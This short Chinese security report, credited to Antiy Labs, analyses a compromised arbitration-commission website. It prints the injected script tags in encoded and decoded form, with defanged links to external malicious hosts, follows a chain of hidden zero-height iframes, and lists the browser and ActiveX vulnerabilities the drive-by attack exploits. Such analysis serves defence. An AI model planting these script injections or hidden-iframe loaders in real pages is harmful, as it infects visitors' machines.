长春仲裁委员会网站遭遇黑客入侵被挂马

该网站问题代码：

<script language=javascript src=hxxp://%6C%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js></script><script language=javascript src=hxxp://%71%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js></script>

解密后：

<script language=javascript src=hxxp://l.94saomm.com/js.js></script><script language=javascript src=hxxp://q.94saomm.com/js.js></script>

上面两条恶意链接内容是一样的，下面我们只跟踪其中一条链接进行分析

hxxp:/q.94saomm.com/js.js问题框架代码：

<iframe src=hxxp:////www.cnwlzx.com//mj//360.htm width=100 height=0><//iframe>

hxxp://www.cnwlzx.com/mj/360.htm问题框架代码：

<iframe src=x.htm width=100 height=1><//iframe>

hxxp://www.cnwlzx.com/mj/x.htm问题框架代码：

经解密后，发现该挂马网页利用以下几个漏洞进行传播：

Adobe Flash Player SWF文件漏洞

RealPlayer播放器IERPCtl.IERPCtl.1漏洞

Real Networks RealPlayer 'rmoc3260.dll' ActiveX控件内存破坏漏洞

MS06-014漏洞

MS08-041漏洞

联众世界GLIEDown2.dll ActiveX控件多个缓冲区溢出漏洞

新浪DLoader Class ActiveX控件任意文件下载漏洞

暴风影音2009(mps.dll)ActiveX远程栈溢出漏洞

超星阅读器4.0漏洞

联众世界GLWorld HanGamePluginCn18类ActiveX控件栈溢出漏洞

Adobe Reader PDF漏洞

MS09-002漏洞

资料来源：安天实验室